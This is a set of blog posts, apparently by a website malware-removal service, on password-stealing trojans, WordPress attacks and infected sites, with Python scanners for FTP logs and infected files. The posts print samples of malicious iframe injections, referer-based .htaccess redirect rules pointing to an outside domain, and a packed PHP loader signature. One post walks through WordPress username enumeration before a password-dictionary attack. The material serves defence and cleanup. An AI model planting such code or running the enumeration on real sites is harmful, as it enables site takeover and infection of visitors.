BlackOS helps website hackers automate their “business”

Trend Micro has released a report that gives some details about the automation of website hacking. Their report (http://blog.trendmicro.com/trendlabs-security-intelligence/new-blackos-software-package-sold-in-underground-forums/) set us off on a search for more information.

We found that this software allows hackers to manage large lists of stolen FTP credentials. The hackers can easily inject custom iframe code into compromised websites. The code can be modified to redirect visitors depending on their operating system (Mac, Windows, etc.), browser (Safari, Firefox, Internet Explorer, Chrome, etc.) and even different versions of those operating systems and browsers.

They can even customize their code to redirect based on the referrer (Google, Yahoo, Bing…) and country of origin.

When you see how the hackers talk about easily finding 10,000 websites, it becomes very alarming. One clip we found is this:

Approximately 15-20% have access to FTP SSH, you can also check behind mail + pass on base have access to FTP or SSH. – all accounts reviewed by our SSH server exploits to get root. With 10k SSH accounts you can get in the area of 500 root access to the servers!

What it appears they’re saying is that 15-20% of FTP accounts are also the credentials for SSH. If so, the hackers can gain “root” access via SSH.

Out of 10K accounts you can get about 500 with server root access! Simple backdoor is installed for all ‘root’s to elevate the rights for consequent access.

If you’re on a VPS or dedicated server, this type of access typically means a complete server rebuild or reload. When they have root access it’s game over. They won.

Why do we bring this to your attention?

You have to constantly think about all the possible ways hackers have of getting into your server – always.

Frequently we see many FTP accounts created for the various websites on a VPS or dedicated server. If you’re going to host multiple websites on your server, please create a separate cPanel account for each site. That creates a separation between your sites.

Let’s be careful out there

If you’ve read anything online, undoubtedly there have been headlines about exploits, vulnerabilities, identities stolen and other compromises.

Are you one of the 9.3% using Internet Explorer 10 (IE10)? Hopefully, you keep your software updated, as Microsoft did squeak in a patch last Tuesday. However, if you haven’t, please stop reading this and update it and all other Microsoft patches immediately.

FireEye recently found a combination of watering-hole attack and drive-by download that utilizes the exploit in IE10.

You don’t know what a watering-hole attack is?

Let’s say the hackers find an exploit in a particular browser and they want to use that to infect the computers of people most likely to use that browser. They will find one or more websites that focus on that particular group of people. The hackers will then try to infect those websites with some drive-by download code. This means that anyone visiting those websites will be subject to the download which will infect their computer.

After the websites have been infected with the drive-by download code, hackers will blast out a series of SPAM emails that include a link to one of their infectious sites. The SPAM will be targeted to people in the targeted industry. This is called a watering-hole attack.

Just so you don’t think I’m focusing on Microsoft, these same types of attacks happen on Firefox, Chrome and yes, even on Macs.

Your best defense against these and other attacks is to keep your software updated – constantly. This doesn’t mean just your browser, but all Adobe products, your operating system and all other software programs installed on your computer.

April of 2014 will see the end of support for Windows XP and Office 2003. If you haven’t upgraded these yet, you should make plans. Without support from Microsoft, you will no longer get updates to that software. Hackers know there will be many people refusing to upgrade so not upgrading will make you the “low hanging fruit” for hackers.

In addition to keeping your software updated, please tell everyone you know to use strong passwords. This cannot be emphasized enough. About 30% of the websites we clean are the result of compromised passwords. Make it at least 9 characters long and DO NOT use common, related words.

A recent informal survey we conducted shows that many passwords end with either the year, 123 or the exclamation mark (!). If this sounds familiar, please change your passwords immediately.

One other key point that we’ve been “pushing” for some time now is to schedule daily full system scans with your anti-virus software.

Here’s why.

If the anti-virus company finds a new virus “in the wild” on Monday, they will analyze it and create a rule to detect that virus. Then on Tuesday, you update your anti-virus software, either automatically or manually. This means your computer is protected from getting infected by that virus from Tuesday moving forward. However, if your computer was infected by that virus on Monday, your anti-virus program won’t remove it until you run a full system scan.

That’s why it’s critical that you run full system scans – EVERY DAY!

If you have any questions, please either email me at: traef@wewatchyourwebsite.com or post a comment.

Let’s be careful out there, huh?

Thank you for reading.

Our business is a painkiller, not a vitamin.

I recently read an article on entrepreneur.com that asked the question, “Is your product a vitamin, or a painkiller?”

It got me thinking about the thousands of website owners we’ve talked with over the years of removing website malware.

We’ve been told, “You’re a saint!”, “You’re so awesome!”, “I love you for fixing this.” “You’re a genius!” and many other compliments.

You see, rarely do people “want” our service – until they need it. Then, it becomes a must have – immediately.

It appears that most website owners don’t believe they’re on the radar of today’s cyber criminals. They believe that hackers focus more on companies like Target and other high profile websites.

We get asked, “what do they want with my little website?”

I remember years ago, there was a book, “Multiple Streams of Income” by Robert Allen. In that book he describes the need to create multiple streams of income so that you slowly, but purposefully, build your net worth. This strategy protects you from the “all your eggs in one basket” disaster.

Hackers (cyber criminals) use this same strategy. A report from a few years ago by Symantec showed that hackers can make up to $1,000 per computer they infect. I believe this number might be a little high now as the cyber criminal world has increased in members, but it must still be relatively accurate.

Websites are at or very near the 1 billion mark. This creates various opportunities for cyber criminals. They can infect 1,000 websites in a week (yes they can!) and use 250 to try and infect the computer of anyone visiting those sites. The next 250 websites out of that 1,000 can be used for a phishing campaign that steals the banking login credentials of unsuspecting people. The remaining 500 websites can be sold to another cyber criminal who wishes to send out spam emails that lead people to the phishing based websites.

Ah, all in a day’s work!

Hackers have many ways to use your website – for their nefarious purposes.

When it happens, people call us to remove the pain. We become their painkiller.

The pain they encounter includes:

  • Loss of search engine rankings
  • Complaints from visitors
  • A sense of being violated

Website owners want and need our services at that point. Then we become their painkiller. Not a vitamin.

Thank you for reading.

FTP Password Stealing Malware

For years now, I’ve been writing about how often websites are infected by hackers stealing their CMS (WordPress, Joomla, etc.), FTP or hosting account login credentials.

I know that some of our competitors roll their eyes whenever we help someone in a forum seeking help with an infected website and we determine that their site was compromised due to stolen login credentials. However, our experience shows this to be a widely used method by today’s cybercriminals.

Here is a link to an article about how this malware works: http://vinsula.com/hunting-down-ftp-password-stealer-malware-with-vinsula-execution-engine/

In the article you’ll see how this malware works. It seeks certain files on your local computer and sends them to the hackers’ CnC server (Command ‘n Control server). You’ll see in that article that it also seeks out certain anti-virus programs and either disables them or reconfigures them.

One other interesting point of this article is how they obtained the malware – via an infected email. You have to be suspicious of all emails. We constantly see one that looks like it’s from LinkedIn, but if you hover over the link to see their profile before accepting their invitation to connect, you’ll see it does not go to www.linkedin.com. This is a very cleverly crafted email designed to infect the unsuspecting recipient.

Please share this with others. The more knowledge shared about how hackers (cybercriminals) work the better and safer we’ll all be. Have any incidents like this to share? Let me know…

Thank you for reading.

What’s the best anti-virus program?

In cleaning infected websites and protecting them, we constantly see infected websites that have been infected due to stolen passwords.

Which passwords?

That all depends. Sometimes it’s the CMS (WordPress, Joomla, Drupal, etc.) or the ecommerce (Zen Cart, osCommerce, etc.). Other times it’s either the hosting account or the FTP account’s password that is stolen.

How can we tell?

There are numerous ways of determining when stolen passwords were used as the point of entry into a hosting account or website, but frequently we can see successful logins in the log files from places all over the world. Mind you, these are not attempted logins, but actual logins.

Often times we can tell by the type of infection or where the infectious code is located, whether or not the point of entry to an infected website is via stolen passwords.

How does this happen?

Typically there is a virus on someone’s local computer that is stealing the password. When this happens you can “cloak” your WordPress login page, you can have a 52 character password with multiple special characters, you can rename the admin account, but none of this matters as the password stealing viruses and trojans steal: the login URL, the username and the password.

This can also happen if you’re using SFTP or FTPS, the “secured” file transfer protocol.

Yes, this even happens to Mac users. Quite often we find that Mac owners don’t have any anti-virus program or they’re using ClamAV for Mac.

With everyone seeking “free” anti-virus programs, we typically recommend: Free version of Avast for Mac, or Sophos for Mac.

On PCs, the most used anti-virus program is Microsoft Security Essentials. That is not what we recommend, but that is what most people are using.

Today, I read an article that gives some details into why Microsoft Security Essentials may not be a reliable program to use if you’re trying to keep your PC safe.

Here is the article I read:

Please understand I am not a Microsoft hater. I don’t hate anyone. But in our efforts to lower our already low re-infection rate (currently at .048%) we like to recommend products that will save you money and be highly effective.

If you could take a minute, let me know what anti-virus program you use and whether you’re on a Mac or a PC.

Thank you.

Unauthorized access to drupal.org

We received an email yesterday:

Dear community member,

We respect the privacy of your information, which is why, as a precautionary measure, we are writing to let you know about an incident that involves your personal information. The Drupal.org Security and Infrastructure Teams have discovered unauthorized access to account information on Drupal.org and groups.drupal.org. Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. However, we are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly.

This unauthorized access was made via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within the Drupal software itself. This notice applies specifically to user account data stored on Drupal.org and groups.drupal.org, and not to sites running Drupal generally.

We have implemented additional security measures designed to prevent the recurrence of such an attack, and to protect the privacy of our community members.

The next time you attempt to log into your account, you will be required to create a new password.

Below are steps you can take to further protect your personal information online. We encourage you to take preventative measures now to help prevent and detect the misuse of your information.

First, we recommend as a precaution that you change or reset passwords on other sites where you may use similar passwords, even though all passwords on Drupal.org are stored salted and hashed. All Drupal.org passwords are both hashed and salted, although some older passwords on groups.drupal.org were not salted. To make your password stronger:

* Do not use passwords that are simple words or phrases
* Never use the same password on multiple sites or services
* Use different types of characters in your password (uppercase letters, lowercase letters, numbers, and symbols).

Second, be cautious if you receive emails asking for your personal information and be on the lookout for unwanted spam. It is not our practice to request personal information by email. Also, beware of emails that threaten to close your account if you do not take the “immediate action” of providing personal information.

For more information, please review the security announcement and FAQ at https://drupal.org/news/130529SecurityUpdate. If you find any reason to believe that your information has been accessed by someone other than yourself, please contact the Drupal Association immediately, by sending an email to password@association.drupal.org.

We regret that this incident has occurred and want to assure you we are working hard to improve security.

If you have an account with drupal.org or groups.drupal.org you should definitely be changing your password. Also, if you use the same email address and password on other sites, you should change those as well.

Please note, if you read this carefully, the unauthorized access was due to a third-party software on the server – NOT a vulnerability with the drupal software and does not affect your own drupal installation.

Just an FYI…

The recent widespread attack on WordPress sites

While we may not have been the first to report this, we have been quietly gathering information and watching.

First, I’d like to start off by saying that this is the “current” attack and most of the suggestions online are temporary fixes for this attack. What about the rest of the time? What about the next attack?

Next, blocking by IP is not going to work. This botnet is so large that the IP addresses could come from anywhere: overseas or even here in the US. This is like blocking user-agents and other easily spoofable settings. Hackers are too smart for this.

Setting your .htaccess to only allow access to your wp-admin or wp-login.php is not going to work for everyone. Most people are still on dynamic IP addresses, so locking it down to a select group of IP’s will lock you out and yes you could go into FTP and delete, but who is going to do that on a regular basis? And, are you going to go back after you’ve logged in and change that .htaccess again? and again?

We have seen in more recent attacks that once the hackers infect a local computer, they can launch their attack from there. So the IP address looks like the attack came from your computer.

Also, changing the location of the wp-admin or wp-login.php file is going to help you on this attack, but the more frequent attack we see is the password stealing trojan.

This trojan has infected PCs and Macs and it steals the URL, username and password sequence. You could change the URL to www.yourdomain.com/wp-dontthinkyoulleverguessthis.php and change your username to rumplestiltskin and have a password that’s twice as long as the English alphabet and you’re still going to have an infected website if you have the password stealing trojan.

If you want to know the username, even if it’s been changed and admin removed, try this with your URL:

http://yourdomain.com/blog/?author=1

Replace the above URL before the ? with the exact URL to your blog. If you get a valid response, you know that you have the admin user still intact. If you’ve changed the admin user or deleted it, you’ll get a response that says something like:

Sorry, but you are looking for something that isn’t here.

To keep searching, change the 1 to a 2 and see what happens. If you get a valid response your URL will have something like:

http://yourdomain.com/author/newadminhere/

Now you know the userID and the username. Add your dictionary of passwords and continue.

You could also password protect the wp-admin folder with an .htaccess file. Guess what? The password stealing trojan steals all the information to a successful login even the secondary passwords.

Over the past 2 weeks, we’ve cleaned 1,978 infected websites and 1,755 of them were compromised due to the password stealing trojan. (62% of the people we’ve helped were using Macs). We have the log files to prove it. We see a website owned by someone here in the US and we see successful logins from all over the world. That is proof.

We hear all the time, “I don’t need anti-virus because I’m on a Mac”. Or, “I don’t have a virus. I know what websites to stay away from.” Really? Because that person’s website was infected and was attacking a browser exploit on the computers of visitors to his site. Surely that person must stay away from their own website then, right?

What does work?

Keep your local computer clean. Install something to detect malicious behavior.

Two-factor authentication works. Captcha is good for now, but we keep seeing reports where hackers have cracked many captchas. But for the automated attacks of hackers, it works well.

Use something like LastPass or on a Mac use KeyChain. Do not save the login credentials in your browser – DO NOT! This is too easy for hackers to steal.

Create a separate user on your local computer and use that for day-to-day work and only log in as administrator when you need to do updates or install software. Keep in mind that when a virus/trojan breaches your computer it has the same access as the currently logged in user. If you have admin rights, guess what? So does the virus/trojan.

In our honeypot analysis of this current attack, it appears that while the hackers are using a dictionary attack of pre-created passwords, they also have buried in their password lists legitimate passwords stolen from computers.

We see the attempted passwords and too many of them are so bizarre that they couldn’t have been part of a computer generated password dictionary.

If you want to hide your real intention, why not bury it inside a larger attack that will cause a lot of frenzy and confusion?

We believe the hackers responsible for this attack are sitting back and laughing at the frenzy they’ve created knowing that their real intention totally slipped by everyone – well almost everyone.

Hackers using errors to redirect websites

Our website malware removal service has removed malware from over 151,000 websites. Our most recent cleanings have seen hackers adding malicious code to 500.php files (which handle website errors of a specific type) and then creating some hidden error in a website to cause the site to call the 500.php file and thus run their malicious code.

The strategy isn’t new, but the method we found recently was quite unique.

The sites we were working on were WordPress sites. The owners of these sites were very diligent about keeping their WordPress core files updated and their plugins too, however, they were less diligent about keeping their own local computers safe.

You see, all of these particular site owners were Mac users. I don’t have anything against Macs, but the fact that Mac users have been told for so long that they don’t need any anti-virus software leaves them vulnerable.

Whether it’s because Macs have finally reached enough popularity, or hackers know most Mac users don’t have any method to detect them, Macs are on the radar of hackers.

We will be posting steps to follow to make it more difficult for hackers to infect your Mac investment.

The specific malicious code found in the 500.php files won’t be posted here because we found some quite radically different code in the sites we’ve recently cleaned. Let’s just say that you should check all of your error pages for anything that doesn’t look like it belongs.

The common thread in these most recent website malware cleanings was that they were all WordPress sites and each one of them, after we removed the malicious code in the error files, would redirect to the /wp-admin/install.php file and give us a 500 error. Upon further investigation (thank you Ty) it was discovered that the database table prefix in the wp-config.php file specified wp_ but the actual tables in the database had prefixes that were quite different. This was the error that the hackers were producing.

By changing the table name prefix, there wasn’t any specific file evidence of anything being changed, except for the 500.php files, but most people see those, know they were put there by the hosting provider and never think twice about them.
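The mismatch described above can be checked mechanically. This is an added example, not code from our cleanup tooling: it assumes you paste in the text of wp-config.php and a list of table names (for instance from SHOW TABLES), and the sample config and table names are constructed.

```python
"""Added example: compare $table_prefix in wp-config.php with the tables that exist."""
import re

# Core tables every single-site WordPress install has under its prefix.
CORE_TABLES = ("options", "posts", "postmeta", "users", "usermeta", "terms", "comments")

# Matches an active (not //-commented) assignment such as: $table_prefix = 'wp_';
PREFIX_RE = re.compile(r"""^\s*\$table_prefix\s*=\s*(['"])(.*?)\1\s*;""", re.M)


def configured_prefix(wp_config_text):
    """Return the prefix wp-config.php declares, or None if none is set."""
    m = PREFIX_RE.search(wp_config_text)
    return m.group(2) if m else None


def prefixes_in_database(table_names):
    """Infer prefixes actually in use: every core table must exist under the prefix."""
    names = set(table_names)
    candidates = {t[: -len("options")] for t in names if t.endswith("options")}
    return sorted(p for p in candidates if all(p + c in names for c in CORE_TABLES))


def check_prefix(wp_config_text, table_names):
    """Report the configured prefix, the prefixes found, and whether they disagree."""
    configured = configured_prefix(wp_config_text)
    found = prefixes_in_database(table_names)
    return {"configured": configured, "found": found, "mismatch": configured not in found}


# Constructed sample: the config says wp_, the database tables use x7k2_.
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'example_db');
// $table_prefix = 'old_';
$table_prefix  = 'wp_';
"""
SAMPLE_TABLES = ["x7k2_" + t for t in CORE_TABLES] + ["x7k2_links", "backup_options"]

if __name__ == "__main__":
    print(check_prefix(SAMPLE_WP_CONFIG, SAMPLE_TABLES))
```

A mismatch on a site that was working yesterday is the cue to look at the error pages as well.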

The strategy here was to infect the page that an error would redirect to and then create a hidden error to cause that error page to be run. Wile-E-Coyote, Super Genius!

I know what you’re thinking (did he fire 6 shots or only 5…) not that. If the website owners had kept everything up-to-date, how did the hackers gain access?

As mentioned, each of these specific infected websites were owned or operated by people with Macs. In our forensic analysis of website infections we always review the log files if available. In each case we found evidence of IP addresses from outside the country of the website owner being used to login to the WordPress dashboard.

Of course many people tell us that’s impossible because they have passwords that are 12 characters long and have a combination of upper and lower case letters, numbers and special characters. Or in a few of these cases, the people had followed the popular WordPress security recommendations and removed the admin user and also used plugins that allowed them to change the name and location of the wp-admin folder. How does a hacker breach a website that has followed all of these steps?

With WordPress being so popular and many people having websites, hackers know that if they infect a local computer, chances are good that the user will have some login to a website. The hackers put keyboard loggers on local computers and just wait for the user to login to a website.

What do they record?

The URL, the username and password. Even if your login URL has been changed to mydomain.com/837ujdndtgkdhghs6s0d6 and your username changed to Rumplestiltskin and your password is nothing short of “Supercalifragilisticexpialidocious” with every other “a” replaced with @ and every third “i” replaced with either a “1”, an “l” or an “!”, the hackers’ malware on your local computer will steal all that information.

Keep in mind, hackers only need one way in to your website. You must know their methods and block them all.

In order to keep your website safe and secure you must be certain that everyone who you provide login rights to for your website, has their local computer fully secured. Otherwise, you’ll be calling us to help you clean your site.

Twitter iframes

Over the past few weeks we’ve cleaned many infected websites that have been infected with an iframe named Twitter. This iframe has nothing to do with Twitter, but that’s what the hackers named it.

It starts out like:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2

where the height and width can be other numbers as well. If this line of code is in a .js file (javascript) then it will probably start with:

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2

This type of infection is usually accompanied by code added to the .htaccess files similar to:


RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://(some malicious domain and querystring goes here) ?h=1459447 [L,R]

We haven’t always seen the modified .htaccess files but generally there will be some “sprinkled” throughout an infected website.

This has been due to compromised login credentials. Many people don’t believe us or want to hear that, but it’s a fact. In all cases where we’ve had access to the FTP logs, we see lines like:

Mon Jan 28 09:35:05 2013 0 xxx.xxx.xxx.xxx 239 /home1/(path to website files)/public_html/wp-includes/Text/.htaccess b _ i r user@domain ftp 1 * c

The i before the r and the username indicates this file was uploaded to your site. If this line in the logs were from someone downloading a file to their local computer or another location, it would have an o.

This activity in a log file shows us that someone from source IP of xxx.xxx.xxx.xxx uploaded a file named .htaccess of 239 bytes to this folder using user@domain on January 28. When we look in the above referenced file it has the Rewrite code listed above. From this we know that a malicious file was uploaded to that site using the username specified. How did this “someone” get that username?

Most likely from a virus on a computer used to legitimately upload files. Yes, even Macs are susceptible.

We also see from the log files that other backdoors have been uploaded. These have to be found and removed or your site will get re-infected again and again.

If you’ve fallen victim to this type of infection, please let us know.

Thank you.

Attack of the default.php files

We’ve been seeing many infected websites that have numerous default.php files “sprinkled” throughout the site.

These files are being used by hackers to infect other websites.

The code inside the default.php files usually starts with:

eval (gzinflate ( base64_decode ("...

The file will usually be either 2,858 or 2,556 in size.

These files are uploaded to the website via FTP.

How do hackers upload files to your site with FTP?

They have stolen your password!

If you have access to your FTP log files, you will see some entries like this:

Sun Jan 13 21:41:48 2013 0 XX.XX.XX.XX 2848 /home/(name of your account)/public_html/default.php b _ i r ftpaccount ftp 1 * c

The ftpaccount shown in the log entry will be the one that has been used by the hackers to upload the default.php files to your site. Whoever is using that account legitimately could be using the computer with a virus on it that has stolen the passwords.
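To pull these entries out of a large FTP log, both here and for the .htaccess uploads in the Twitter iframe post, the following added example (not code from the original posts) parses xferlog-style lines and lists completed uploads of .htaccess and .php files per FTP account. It assumes the field order shown in the log lines above; the sample log, account name and documentation-range IP addresses are constructed.

```python
"""Added example: flag FTP uploads of .htaccess/.php files in an xferlog-style log."""
import posixpath
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime


@dataclass
class Transfer:
    when: datetime
    remote_host: str
    size: int
    path: str
    direction: str  # "i" = incoming (upload to the server), "o" = outgoing (download)
    username: str
    status: str     # "c" = complete, "i" = incomplete


def parse_xferlog_line(line):
    """Return a Transfer, or None if the line is not an xferlog record."""
    tok = line.split()
    # 5 date tokens + transfer time, host, size + >=1 path token + 9 trailing fields
    if len(tok) < 18:
        return None
    try:
        when = datetime.strptime(" ".join(tok[:5]), "%a %b %d %H:%M:%S %Y")
        size = int(tok[7])
    except ValueError:
        return None
    _type, _flag, direction, _mode, username, _svc, _auth, _auth_id, status = tok[-9:]
    if direction not in ("i", "o", "d"):
        return None
    # Everything between the size and the trailing fields is the path, so a
    # file name containing spaces does not shift the direction/username columns.
    path = " ".join(tok[8:-9])
    return Transfer(when, tok[6], size, path, direction, username, status)


def is_suspicious_upload(t):
    """Completed upload of a file type these infections drop (.htaccess or .php)."""
    name = posixpath.basename(t.path).lower()
    wanted = name == ".htaccess" or name.endswith(".php")
    return t.direction == "i" and t.status == "c" and wanted


def suspicious_uploads(lines):
    parsed = (parse_xferlog_line(line) for line in lines)
    return [t for t in parsed if t is not None and is_suspicious_upload(t)]


def uploads_by_account(transfers):
    """Map each FTP username to {remote_host: number of flagged uploads}."""
    summary = defaultdict(Counter)
    for t in transfers:
        summary[t.username][t.remote_host] += 1
    return {user: dict(hosts) for user, hosts in summary.items()}


# Constructed sample log (not taken from a real server).
SAMPLE_LOG = """\
Sun Jan 13 21:41:48 2013 0 203.0.113.7 2848 /home/exampleacct/public_html/default.php b _ i r ftpaccount ftp 1 * c
Sun Jan 13 21:41:50 2013 0 203.0.113.7 239 /home/exampleacct/public_html/wp-includes/Text/.htaccess b _ i r ftpaccount ftp 1 * c
Sun Jan 13 22:05:10 2013 1 198.51.100.23 51200 /home/exampleacct/public_html/images/team photo.jpg b _ i r ftpaccount ftp 1 * c
Mon Jan 14 08:12:31 2013 0 198.51.100.23 4096 /home/exampleacct/public_html/index.php b _ o r ftpaccount ftp 1 * c
this line is not an xferlog record
"""

if __name__ == "__main__":
    hits = suspicious_uploads(SAMPLE_LOG.splitlines())
    for t in hits:
        print(t.when, t.remote_host, t.username, t.size, t.path)
    print(uploads_by_account(hits))
```

Your own legitimate uploads of .php files will be listed too, so compare each flagged entry's source address and time against when you were actually working on the site.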

The default.php files are also used to upload malicious .htaccess files. Those files will have something like this:

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http: //[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

RewriteRule ^.*$ http: //le-guide-thalasso-sainte-maxime. com/wapn.html?h=1415319 [L,R]

We’ve seen various domains inserted into that last line but the format is basically the same: URL/randomname.html?h=(some numbers)

First thing is to change all your passwords: hosting account, FTP, website (WordPress, Joomla or other…). Then DO NOT log back in again until you have scanned all your computers – yes even Macs.

Next, reviewing the log files will show you where on your site the files were uploaded and then you can delete those files. Check your .htaccess files for any code similar to the above. If there was already a .htaccess file in that folder, they have added their malicious redirects. The above lines can simply be removed from your file.

If there wasn’t already a .htaccess file there then the hackers have added one and it can just be deleted.

Again, please run daily virus scans on all computers – daily. When your anti-virus program updates, it typically doesn’t run a full scan. So any updates you received today on your anti-virus program will not detect anything already on your system until you run a full scan. The updates will only protect your computer from the new infections.

With this infection there are typically additional backdoor shell scripts added to the site as well. Those have generally been something using the base64_decode string so you can search your files for that and then further analyze the file to determine if it’s malicious or not.
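The file checks described above can be run over a whole site in one pass. This added example (not code from the original post) walks a local copy of the web root and reports PHP files containing the eval/gzinflate/base64_decode wrapper, PHP files that merely call base64_decode and need a manual look, and .htaccess files that pair an HTTP_REFERER condition with a redirect to another host. The function names, verdict labels and sample contents are constructed for illustration.

```python
"""Added example: scan a web root for packed PHP loaders and referer-based redirects."""
import os
import re

# eval(gzinflate(base64_decode(...  with optional whitespace between the calls
PACKED_LOADER = re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
BASE64_CALL = re.compile(r"base64_decode\s*\(", re.I)
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I | re.M)
# RewriteRule whose substitution is an absolute URL; group 1 is the target host
ABSOLUTE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://([^/\s?:]+)", re.I | re.M)


def classify(name, text, own_hosts=()):
    """Return a verdict string for one file, or None if nothing matched."""
    base = os.path.basename(name).lower()
    if base == ".htaccess":
        own = {h.lower() for h in own_hosts}
        targets = sorted({h.lower() for h in ABSOLUTE_RULE.findall(text)} - own)
        if targets and REFERER_COND.search(text):
            return "referer-redirect:" + ",".join(targets)
    elif base.endswith(".php"):
        if PACKED_LOADER.search(text):
            return "packed-loader"
        if BASE64_CALL.search(text):
            return "base64-review"  # legitimate code also calls base64_decode
    return None


def scan_tree(root, own_hosts=(), max_bytes=2_000_000):
    """Walk root and return sorted (relative path, verdict) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname != ".htaccess" and not fname.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read(max_bytes)
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
            verdict = classify(fname, text, own_hosts)
            if verdict:
                findings.append((os.path.relpath(full, root), verdict))
    return sorted(findings)


# Constructed sample contents; the redirect host is a reserved .invalid name.
SAMPLES = {
    "default.php": '<?php eval(gzinflate(base64_decode("CONSTRUCTED-PLACEHOLDER")));',
    "contact.php": "<?php $img = base64_decode($row['thumb']); echo 'ok';",
    ".htaccess": (
        "RewriteEngine On\nRewriteBase /\n"
        "RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)\n"
        "RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\\1$ [NC]\n"
        "RewriteRule ^.*$ http://redirect.example.invalid/wapn.html?h=1415319 [L,R]\n"
    ),
}

if __name__ == "__main__":
    for sample_name, sample_text in SAMPLES.items():
        print(sample_name, "->", classify(sample_name, sample_text))
```

Pass your own domain names as own_hosts so that rewrite rules pointing at your own site are not reported.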

If you need help cleaning this up, please send me an email at: traef@wewatchyourwebsite.com

Thank you.

If you found this useful, please share it.